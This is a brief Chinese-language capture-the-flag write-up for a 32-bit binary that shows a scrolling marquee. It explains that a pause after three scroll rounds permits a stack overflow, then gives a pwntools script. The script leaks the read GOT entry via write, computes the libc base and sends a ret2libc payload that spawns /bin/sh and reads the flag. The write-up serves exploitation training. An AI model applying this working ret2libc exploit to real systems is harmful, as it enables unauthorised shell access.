简单的程序,开始运行后会有一个跑马灯滚动。
反编译看源代码发现,跑马灯滚动三轮后有个短暂停顿,可以利用停顿间隔进行栈溢出。
from pwn import *
import time
context.log_level='debug'
r = remote("220.249.52.133",51688)
#r = process("./format",shell = True) #executes the binary
r.recvuntil("\n\n")
e = ELF("./format")
libc=ELF("./libc_32.so.6")
writeplt = e.symbols['write']
writegot = e.got['write']
readplt = e.symbols['read']
readgot = e.got['read']
main = e.symbols['gee']
payload1 = "A" * 140 + p32(writeplt) + p32(main) + p32(1) + p32(readgot) + p32(4)
r.sendline(payload1 ) #feeds the exploit to the binary
a=unpack(r.recv(4)) #gets the four bytes we leaked from the GOT
print hex(a)
libc_base = a - libc.symbols['read']
success('libcbase:'+hex(libc_base))
libc.address = libc_base
system_address = libc.symbols['system']
binsh_address = libc.search('/bin/sh').next()
r.sendline("A"*140 + pack(system_address)+ "BBBB"+ pack(binsh_address))
r.sendline("cat flag")
r.recvuntil("}\n")
r.close()
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
